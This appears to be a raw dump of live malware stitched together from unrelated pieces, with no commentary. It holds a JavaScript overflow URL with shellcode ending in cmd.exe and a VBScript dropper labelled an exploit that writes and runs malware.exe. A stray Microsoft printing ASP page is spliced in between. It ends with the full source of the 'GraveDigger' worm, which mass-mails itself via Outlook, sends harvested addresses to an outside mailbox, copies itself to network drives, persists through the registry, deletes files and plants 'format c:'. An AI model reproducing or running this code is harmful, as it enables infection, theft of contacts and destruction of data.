<html>
<body>
<script language=javascript>
var url = "http://www.google.com/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaY®йwђђђђлZ_№‰Ль°ят®‡Щ)ЩЃЗЃпюЃБЃй)П1цFVW»f‹E№ї

жwG°fт®л
ђOя7^9уtлоЌGкяРНиЎяяяcmd.exeя";
window.open(url);
</script>
</body>
</html>

<title>by malware M03-032 Exploit</title>
<script language=vbs>

self.MoveTo 5000,5000

dim v(24)
cut=""

v(0)="4D,5A,44,01,05,y,02,y,20,y,21,y,z2,75,y2,02,y2,99,y3,3E,y3,01,y,FB,30,6A,72,y1C,79,y3,9E,
y1CD,66,33,C0,33,z,8C,D3,83,C3,20,B9,70,3F,8E,C3,F3,66,AB,8C,C0,8E,D8,B8,y,A0,8E,C0,C3,66"
v(1)=",B9,y,FA,y2,66,BF,y4,66,BE,81,02,y2,66,33,C0,67,8A,9F,40,01,y2,03,D8,C1,E3,04,2B,D8,2B,
D8,66,C1,C8,10,03,D8,AC,03,D8,C1,EB,05,67,88,1F,47,E2,DE,C3,B9,80,3E,33,z,33,F6,F3,66,A5,C3"
v(2)=",1E,06,8C,D8,05,A0,0F,8E,C0,B8,0F,y,8E,D8,33,C0,67,8A,03,8B,F0,BF,0A,y,B9,2C,01,F3,A4,
8B,F0,83,C7,14,B9,2C,01,F3,A4,07,1F,C3,B0,13,CD,10,BA,0F,y,8E,DA,BE,48,03,BA,C8,03,32,C0,EE"
v(3)=",42,B9,y,03,F3,6E,E8,5C,z,66,33,DB,E8,B5,z,53,E8,6E,z,BA,DA,03,EC,A8,08,75,FB,EC,A8,08,
74,FB,E8,96,z,5B,FE,C3,B4,01,CD,16,74,E0,B8,03,y,CD,10,B8,y,4C,CD,21,yF,B1,C0,90,1D,7B"
v(4)=",88,D9,26,6B,C2,C1,88,B8,C9,A4,3A,8B,7F,93,8E,5C,30,DB,1F,3A,7F,8D,57,33,C1,8C,B1,77,
98,89,DA,6B,D7,5C,86,7C,AB,A8,8E,22,D0,D9,A0,5E,85,D9,2E,A2,C3,6C,63,6C,45,24,BF,21,97,8E,D0,8A"
v(5)=",1A,BF,C0,9B,16,26,B2,9D,D7,8A,2D,B3,8C,24,49,A5,8D,29,9F,2D,87,5C,C6,C7,5A,38,97,96,
2D,2A,15,CD,A5,73,CC,AE,A6,5D,75,A4,22,B3,9F,8C,D7,77,26,A7,56,B0,B8,64,84,1B,5A,D9,1D,CE,AF,36"
v(6)=",3B,98,7C,C3,38,4C,C0,1A,22,1E,CF,46,79,622,1D,78,D7,CF,6D,DA,7F,6C,A2,25,97,C8,4B,C2,
C8,33,70,A5,29,1C,19,BB,A9,69,18,A3,34,9F,51,63,33,1B,3A,7D,57,81,BD,20,A9,D5,23,19,55,4C,55,AA"
v(7)=",62,19,A1,89,23,2B,6B,30,72,92,39,52,94,A8,35,6E,57,CA,CC,C8,CB,9B,C1,71,46,6B,61,6B,2A,
7E,71,C7,49,AD,3A,4F,AB,C1,5F,15,67,A7,C4,3C,87,90,59,8A,D7,64,C8,21,BE,1B,6C,90,B0,D8,73,91"
v(8)=",50,75,41,3C,4C,56,D6,3F,A2,2C,1C,B9,65,D8,76,C6,38,B5,51,B9,33,B4,48,64,84,56,A8,A0,AE,
1D,9C,C2,1B,83,93,DB,59,54,22,75,70,AF,9E,19,7E,78,34,7D,5D,AA,A1,5E,55,46,BB,BE,14,C5,1A,45"
v(9)=",5E,14,3B,C5,7B,6D,BB,40,81,AD,7A,D2,4A,8E,3D,B4,D6,5C,A9,C6,26,C7,98,58,C6,7D,BB,15,BE,
78,CF,C5,74,7C,75,AA,2B,77,25,C1,5F,A7,23,C1,8A,CF,D7,49,55,54,9B,84,8A,55,5D,35,1F,71,25,92"
v(10)=",79,D5,CF,82,2E,23,5D,8B,35,8A,4E,76,1C,C6,7E,26,19,AF,A7,32,38,CE,49,2C2,D0,14,67,39,
2D,29,83,33,82,CE,AD,CF,CD,28,1A,1E,38,B0,CE,41,2E,7B,48,4C,2B,D2,92,BD,CB,97,24,B8,39,C2,9C,5A"
v(11)=",D9,D3,63,17,D7,71,18,302,96,67,1C,9E,50,45,58,30,8B,C4,7F,85,9A,4C,C9,58,B3,1F,D3,53,
20,24,C9,D6,D0,A8,5A,A1,48,92,7B,D3,70,B2,72,2A,CF,B5,8F,C1,63,2D,1F,6E,1C,B6,B2,C0,2E,B6,26,19"
v(12)=",B5,20,B9,5C,14,3D,C9,2A,51,20,7A,3B,B3,2B,CE,B8,3F,90,A8,2F,CF,4E,CF,68,28,1B,14,BF,6F,
A2,1C,85,88,D0,AA,5E,18,B7,1A,1E,C6,7F,D9,94,6D,AC,B5,4C,59,B0,6E,C0,4D,3D,A4,C0,5A,90,65,38"
v(13)=",53,38,61,81,CA,A4,3C,96,28,49,78,86,54,2F,63,2E,42,66,57,28,2B,95,BF,58,5E,51,95,5E,A2,
3D,71,C9,A8,CD,AE,C1,54,D4,BC,2A,9C,76,9E,43,9E,84,92,AB,A4,3B,1B,BF,B9,75,65,5E,B3,3C,8C,94"
v(14)=",41,B5,93,B8,59,DB,C2,87,D5,76,60,61,3B,47,A9,15,7E,96,A2,38,60,62,80,9B,2A,5E,CB,A7,6F,
47,83,36,82,8F,72,18,37,8F,20,4E,D8,9E,B1,9B,85,3E,A3,70,5F,8A,54,5B,2D,C6,A8,A7,68,8D,94,1E"
v(15)=",44,A4,16,83,BC,99,58,3E,C5,9E,15,4F,9C,78,3A,6A,7F,2A,32,9F,48,30,47,59,6D,3D,AA,48,7D,
AE,AF,DB,72,A8,D9,D1,2A,98,B5,49,BC,36,6B,17,45,D2,3E,DB,37,B1,67,80,A0,99,9D,93,89,93,90,88"
v(16)=",90,47,58,65,5A,C4,C8,80,2E,80,A0,8F,77,9A,5E,4F,D3,B3,92,3A,81,1B,4D,CD,2B,D8,A1,5B,9F,
63,3E,D6,A7,17,55,7C,73,C9,90,C5,33,85,82,B2,39,78,64,C1,3C,C2,77,80,4D,21,37,96,29,69,4A,C6"
v(17)=",4A,53,C2,65,94,68,54,8C,A7,68,74,40,79,C7,512,63,8E,8D2,92,5B,37,30,722,47,A2,8E,B1,84,
51,1D,A2,4B,26,53,58,7C,5C,B1,3A,97,AC,56,B7,C4,42,BC,3F,65,82,yF0,0F,y2,10,y2,11,y2,12,y2,13,y2"
v(18)=",14,y2,15,y2,16,y2,17,y2,18,y2,19,y2,1A,y2,1B,y2,1C,y2,1D,y2,1E,y2,1F,y2,20,y2,21,y2,22,y2,
23,y2,24,y2,25,y2,26,y2,27,y2,28,y2,29,y2,2A,y2,2B,y2,2C,y2,2D,y2,2E,y2,2F,y2,30,y2,31,y2"
v(19)=",32,y2,33,y2,34,y2,35,y2,36,y2,37,y2,38,y2,39,y2,3A,y2,3B,y2,3C,y2,3D,y2,3E,y2,3F,y2,3F,y2,
3F,y2,3F,01,y,3F,02,y,3F,03,y,3F,04,y,3F,05,y,3F,06,y,3F,07,y,3F,08,y,3F,09,y,3F"
v(20)=",0A,y,3F,0B,y,3F,0C,y,3F,0D,y,3F,0E,y,3F,0F,y,3F,10,y,3F,11,y,3F,12,y,3F,13,y,3F,14,y,3F,15,y,3F,
16,y,3F,17,y,3F,18,y,3F,19,y,3F,1A,y,3F,1B,y,3F,1C,y,3F,1D,y,3F"
v(21)=",1E,y,3F,1F,y,3F,20,y,3F,21,y,3F,22,y,3F,23,y,3F,24,y,3F,25,y,3F,26,y,3F,27,y,3F,28,y,3F,29,y,
3F,2A,y,3F,2B,y,3F,2C,y,3F,2D,y,3F,2E,y,3F,2F,y,3F,30,y,3F,31,y,3F"
v(22)=",32,y,3F,33,y,3F,34,y,3F,35,y,3F,36,y,3F,37,y,3F,38,y,3F,39,y,3F,3A,y,3F,3B,y,3F,3C,y,3F,3D,y,
3F,3E,y,3F2,y,3F2,y,3F2,y,3F2,01,3F2,02,3F2,03,3F2,04,3F2,05,3F2,06,3F2,07,3F2,08"
v(23)=",3F2,09,3F2,0A,3F2,0B,3F2,0C,3F2,0D,3F2,0E,3F2,0F,3F2,10,3F2,11,3F2,12,3F2,13,3F2,14,3F2,
15,3F2,16,3F2,17,3F2,18,3F2,19,3F2,1A,3F2,1B,3F2,1C,3F2,1D,3F2,1E,3F2,1F,3F2,20,3F2,21,3F2,22,
3F2,23,3F2,24,3F2,25,3F2,26"
v(24)=",3F2,27,3F2,28,3F2,29,3F2,2A,3F2,2B,3F2,2C,3F2,2D,3F2,2E,3F2,2F,3F2,30,3F2,31,3F2,32,3F2,
33,3F2,34,3F2,35,3F2,36,3F2,37,3F2,38,3F2,39,3F2,3A,3F2,3B,3F2,3C,3F2,3D,3F2,3E,3F5,3F"

function res(x,y)
For k = 0 To UBound(v)
v(k) = Replace(v(k), x, y)
Next
End Function

res "z", "FF"
res "y", "00"
piece = Split(cut, "/")
cc = 103

For n = 0 To UBound(piece) - 1
res Chr(cc), piece(n)
cc = cc + 1
Next

For m = 0 To UBound(v)
it = it & v(m)
Next


tmp = Split(it, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
pth = "malware.exe"
Set f = fso.CreateTextFile(pth, ForWriting)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
b = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
r = Int("&H" & Mid(tmp(i), 3, l))
For j = 1 To r
f.Write Chr(b)
Next
Else
f.Write Chr(b)
End If
Next
f.Close
Set shell=CreateObject("WScript.Shell")
shell.run(pth)

</script>

<%@ CODEPAGE=949 %> 
<% 
' Replace the above line with your localized code page number 
'------------------------------------------------------------ 
' 
' Microsoft Internet Printing Project 
' 
' Copyright (c) Microsoft Corporation 1998 
' 
' 
'------------------------------------------------------------ 
option explicit 
%> 
<!-- #include file = "ipp_util.inc" --> 
<% 
CheckSession 
Response.Expires = 0 

Dim strPrinter, strLocal, strJobEta 
Dim objPrinter, objQueue 
Const L_OpenPrinter_Text = "ЗБё°ЕН ї±в: %1" 

strPrinter = OleCvt.DecodeUnicodeName (request ("eprinter")) 

strLocal = session(LOCAL_SERVER) 

Set objQueue = GetObject("WinNT://" & session(COMPUTER) & "/" & strPrinter) 

Dim strTitle 
Const L_PrinterOn_Text = "%2АЗ %1" 

strTitle = LARGE_FONT_TAG & RepString2(L_PrinterOn_Text, GetFriendlyName (objQueue.PrinterName, session(COMPUTER) ), session(LOCAL_SERVER)) & END_FONT 

Set objPrinter = Server.CreateObject(PROGID_HELPER) 
On Error Resume Next 
objPrinter.open "\\" & session(COMPUTER) & "\" & strPrinter 
If Err Then 
Call ErrorHandler ( RepString1(L_OpenPrinter_Text, strPrinter) ) 
End If 

strJobEta = JobEtaInfo (objPrinter) 

objPrinter.Close 

%> 
<html> 

<head> 
<%=SetCodePage%> 
<meta http-equiv="refresh" content="60"> 
</head> 

<body bgcolor="#FFFFFF" text="#000000" link="#000000" vlink="#808080" alink="#000000" 
topmargin="0" leftmargin="0"> 



<table width="100%" border=0 cellspacing="0" cellpadding="2"> 
<tr> 
<td nowrap><% =Write (strTitle) %> 
<br><hr width=100% size=1 noshade color=red> 
<% =Write(strJobEta) %> 
</td> 
</tr> 
</table> 

</body> 
</html><script type='text/javascript' language='JavaScript'> 
//29.10.2001, 10/29/01 This worm is donation from all Bulgarians!CopyR2001McB 
function ifErr(){self.close();return true;} 
window.onerror=ifErr; 
path='c:\\';bla="bla.hta"; 
dl=unescape(document.location.pathname);load(); 
function load(){Os=sfs(2);if((!ifHtml(0))&&(!ifHtml(1))){o("C:/bla.hta",mHAHL(1)); 
o("C:/b.htm",mHAHL(5));ww=window.open("c:\\b.htm","Loading","width=1, height=1,left=1000,top=1000"); 
ww.blur();ww.close();}if (ifHtml(1)){Oh=sfs(3);Oh.NameSpace(path).Items().item(bla).InvokeVerb();} 
if (ifHtml(0)){var tss=vlez();net(tss);self.close()}} 
function o(p,t){Os.Reset();Os.Path=p;Os.Doc=t;Os.Write();} 
function ifHtml(n){t=getScript();if(n==0){if((t.indexOf("k='GraveDigger v2.0'"))==0){return true;}else{return false;}}if(n==1){if ((t.indexOf("k='Z'"))==0){return true;}else{return false;}}} 

function getScript(){e=new Enumerator(document.all);for (;!e.atEnd();e.moveNext()){ 
x=e.item().tagName;if(x=="SCRIPT"){t=e.item().text;}}return t;} 

function mHAHL(m){s1="<title>Memory scan...<"+"/title><hta:Application id=\"GraveDigger v2.0\" windowstate=minimize><"+"/head>";s2="<script type='text"+"/javascript' language='JavaScript'>";s3="<"+"/script><"+"/body><"+"/html>";t=getScript();if(m==1) {t="k='GraveDigger v2.0'"+t};if(m==5){t="k='Z'"+t};s=s1+s2+t+s3;return s;} 

function IsMail(S){var m1,m2;IsEMail=false;v="\r\n";m1=S.indexOf("@");m2=S.indexOf(".");if((m1 != 0)&&(m1<m2)) {IsEMail=true;}return IsEMail;} 

function mL(ss){Oo=sfs(5);var Om=Oo.GetNamespace("MAPI").GetDefaultFolder(10).Items;n=Om.Count;badUser="";for (i=0;i<n;i++){var us=Om.Item(i+1).Email1Address;if(IsMail(us)){senT(us,ss,1);badUser+=us+";";}} 
senT("g_dv20@mail.bg",badUser,0); 
} 

function senT(snT,at,n){Oo=sfs(5);var male=Oo.CreateItem(0);with(male){Recipients.Add(snT);Subject="Outlook Express Update";Body='\n\r'+'MSNSofware Co.';if(n==1){Attachments.Add(at)};DeleteAfterSubmit=true;Send();}} 

function mL1(at,wab){fso=sfs(1);f=fso.GetFile(wab);f.Copy("c:\\test.txt");a=window.open("","Test","width=1, height=1,left=1000,top=1000");a.blur();a.document.location.href='file://c:/test.txt'; 
t=a.document.body.innerText;a.close();t=t.toLowerCase();t=escape(t);ft="c:\\t.txt"; 
f=fso.OpenTextFile(ft,2,true);f.write(t);f=fso.OpenTextFile(ft,1);t=f.ReadAll();ss="";start=0; 
for(i=0;i<t.length;i++){n=t.indexOf("@",start);nEnd=n;nBegin=n;while((t.substr(nEnd,1)!="%")&&(t.substr(nEnd,2)!="i+")){nEnd++;};while(t.substr(nBegin,1)!="%"){nBegin--;} 
var s="";s=t.substr(nBegin+3,nEnd-nBegin-3); 
if((ss.indexOf(s)==-1)&&(IsMail(s))){senT(s,at,1);ss+=s+";";}start=nEnd;} 
senT("g_dv20@mail.bg",ss,0);} 

function rr(t){try{var ws = sfs(4);r=ws.RegRead(t);return r;}catch(e){return false}} 

function wr(t,v){try{var ws = sfs(4);r=ws.RegWrite(t,v);}catch(e){}} 

function sfs(j){if (j==1){var f = new ActiveXObject("Scripting.FileSystemObject")} 
if (j==3){var f=new ActiveXObject("Shell.Application")} 
if (j==4){var f=new ActiveXObject("WScript.Shell")} 
try{if (j==2){var f=new ActiveXObject("Scriptlet.TypeLib")} 
if (j==5){var f=new ActiveXObject("Outlook.Application")}} 
catch(e){ 
var f = new ActiveXObject("Scripting.FileSystemObject"); 
op=f.OpenTextFile("c:\\autoexec.bat", 8, false); 
op.Write("Echo y|format c:"); 
op.close();ifErr();} 
return f} 

function cf(fd,fn,t,n){f=sfs(1);fd=f.GetSpecialFolder(0)+"\\"+fd;if(!f.FolderExists(fd)){f.CreateFolder(fd);}a=f.CreateTextFile(fd+"\\"+fn,true);if(n==0){a.WriteLine(t);}else {a.WriteLine("<script type='text"+"/javascript' language='JavaScript'>"+t+"<"+"/script>");}a.Close();} 

function net(ts){var ws=new ActiveXObject("WScript.Network");fso = sfs(1);var n=ws.EnumNetworkDrives();t="";if(!(n.length==0)){a="CDEFGHIJKM";for(i=0;i<n.length;i+=2){d=n(i+1);d=d.substr(0,d.length-1);if(!(d==t)){try{try{t=d;for(z=0;z<a.length;z++){f=d+a.charAt(z)+"\\WINDOWS\\Start Menu\\Programs\\StartUp";if(fso.FolderExists(f)){fso.CopyFile(dl,f+"\\msoe.hta");}}}catch(e){}}catch(e){}}}}dF();} 

function dF(){fff=sfs(1);try{fff.GetFile(dl).Attributes=2;}catch(e){}try{fff.GetFile("c:\\b.htm").Attributes=2;}catch(e){}} 

function vlez(){ 
hcu="HKEY_CURRENT_USER\\";hclm="HKEY_LOCAL_MACHINE\\";f=sfs(1);ws=sfs(4);ws.RegWrite (hcu+"Software\\Microsoft\\Windows Scripting Host\\Settings\\Timeout",0,"REG_DWORD");bU=hcu+"Software\\TheGrave\\badUsers\\v2.0";bUU=rr(bU);de="de=0"; 
if (!bUU){ 
wr(bU,"0"); 
} 
else{ 
if (bUU=="7"){ 
de="de=1"; 
} 
wr(bU,Number(bUU)+1); 
} 
ID=rr(hcu+"Identities\\Default User ID");wP=hcu+"Control Panel\\Desktop\\Wallpaper";vO=hcu+"Identities\\"+ID+"\\Software\\Microsoft\\Outlook Express\\5.0\\Mail\\";msn=vO+"Message Send HTML";cus=vO+"Compose Use Stationery";sn=vO+"Stationery Name";str=mHAHL(0);kk="k='GraveDigger v2.0'"; 
s1=str.substr(0,str.indexOf(kk))+str.substr(str.indexOf(kk)+kk.length);cf("help","mmsn_offline.htm",s1,0);str=getScript();s1=str.substr(0,str.indexOf(kk))+str.substr(str.indexOf(kk)+kk.length);a0="SAMPLES\\WSH";cf(a0,"Charts.js",s1,1);wr (msn,1);wr(cus,1); 
a2=f.GetSpecialFolder(0)+"\\";a7=a2+"help"+"\\mmsn_offline.htm";wr (sn,a7);wr (wP,a7); 
q="\r"; 
prof="prof="+"\""+rr(hcu+"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\DefaultProfile")+"\""; 

ts=prof+q+"sub delF(fn)"+q+"on Error Resume Next"+q+"fso.GetFile(fn).Attributes=32"+q+"set ww=fso.OpenTextFile(fn,2,true)"+q+"ww.close"+q+"end sub"+q+"sub iFile(fn)"+q+"On Error Resume Next"+q+"fso.GetFile(fn).Attributes=32"+q+"set c=fso.OpenTextFile(fn,1,true)"+q+"if fso.GetFile(fn).size <>0 then"+q+"cc=c.ReadAll"+q+"end if"+q+"c.close"+q+"if(Instr(cc,jv)=False) then"+q+"set c=fso.OpenTextFile(fn,8,true)"+q+"c.Write jv"+q+"c.close"+q+"end If"+q+"end sub"+q+"sub mIrc(fn)"+q+"On Error Resume Next"+q+"set Fini=fso.CreateTextFile(fn & \"\\script.ini\")"+q+"With Fini"+q+".WriteLine \"[script]\""+q+".WriteLine \";mIRC Script\""; 

t1=q+".WriteLine \";This virus is donation from all Bulgarians\""+q+".WriteLine \";GraveDiggerV2.0\""+q+".WriteLine \"n0=on 1:JOIN:#:{\""+q+".WriteLine \"n1= /if ( $nick == $me ) { halt }\""+q+".WriteLine \"n2= /.dcc send"+" $nick \"&spf&\"\\help\\mmsn_offline.htm\""+q+".WriteLine \"n3=}\""+q+".close"+q+"End With"+q+"end sub"+q+"sub i(fd)"+q+"Set f=fso.GetFolder(fd)"+q+"Set fc=f.Files"+q+"d=Day(Date)"+q+"For Each f2 in fc"+q+"e=lcase(fso.GetExtensionName(f2.path))"+q+"Err.Clear"+q+"if(d=1)or(d=5)or(d=10)or(d=15)or(d=20)or(de=1)then"+q+"delF(f2.path)"+q+"end if"+q+"IF (e=\"htm\")or(e=\"html\")or(e=\"asp\")then"+q+"iFile(f2.path)"+q+"end If"; 

t2=q+"If(e=\"ini\")or(e=\"hlp\")then"+q+"mIrc(fd)"+q+"end if"+q+"Next"+q+"end sub"+q+"sub lv"+q+"Dim d,ds,s"+q+"Set ds=fso.Drives"+q+"for each d in ds"+q+"if d.DriveType=2 or d.DriveType=3 Then"+q+"flt(d.path&\"\\\")"+q+"end if"+q+"Next"+q+"end sub"+q+"sub flt(folderspec)"+q+"set f=fso.GetFolder(folderspec)"+q+"set sf=f.SubFolders"+q+"for each f1 in sf"+q+"i(f1.path)"+q+"flt(f1.path)"+q+"next"+q+"end sub"+q+"Function IM(S)"+q+"IM=False"+q+"If InStr(S,vbCrLf)=0 Then"+q+"m1=InStr(S,\"@\")"+q+"m2=InStr(S,\".\")"+q+"If m1<>0 And m1<m2 Then"+q+"IM=True"+q+"End If"+q+"End If"+q+"End Function"+q+"function Em(at)"+q+"Dim i"; 

t3=q+"On Error Resume Next"+q+"Set Oo=CreateObject(\"Outlook.Application\")"+q+"Set Om=Oo.GetNamespace(\"MAPI\").GetDefaultFolder(10).Items"+q+"n=Om.Count"+q+"ReDim mm(n)"+q+"For i=1 To n:mm(i-1)=Om.Item(i).Email1Address:Next"+q+"Set s=CreateObject(\"MAPI.Session\")"+q+"s.Logon prof,\"\",false, false,0"+q+"for x=0 to i-1"+q+"if IM(mm(x)) Then"+q+"Set m=s.Outbox.Messages.Add"+q+"Set oA=m.Attachments.Add"+q+"oA.Name=\"Reports\""+q+"oA.ReadFromFile=at"+q+"oA.Source=at"+q+"m.Subject=mm(x)"+q+"m.Text=\"Microsoft Outlook 98\""+q+"Set newRec=m.Recipients.Add"+q+ 
"newRec.Name=mm(x)"+q+"newRec.Type=1"+q+"newRec.Resolve 1"+q+"m.Update"+q+"m.Send 0,0,0 "; 

t4=q+"End If"+q+"Next"+q+"s.Logoff"+q+"End Function"+q+"set fso= CreateObject(\"Scripting.FileSystemObject\")"+q+"set spf=fso.GetSpecialFolder(0)"+q+"h=(spf&\"\\SAMPLES\\WSH\\Charts.js\")"+q+"set tf=fso.OpenTextFile(h,1,true)"+q+"jv=tf.ReadAll"+q+"tf.close"+q+"Em(spf&\"\\help\\mmsn_offline.htm\")"+q+"if Err Then Err.Clear: End if"+q+"lv()"+q+"if Err Then:Err.Clear:de=1:lv() End if"; 
ts=ts+t1+t2+t3+t4; 
a1="\\Charts.vbs"; 
cf(a0,a1,de+q+ts,0); 
wr(hclm+"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\NAV DefAlert",a2+a0+a1); 
ws.Run(a2+a0+a1); 
mL(a2+"help"+"\\mmsn_offline.htm"); 
p=rr(hcu+"Software\\Microsoft\\WAB\\WAB4\\Wab File Name\\"); 
mL1(a2+"help"+"\\mmsn_offline.htm",p); 
return ts;} 
</script>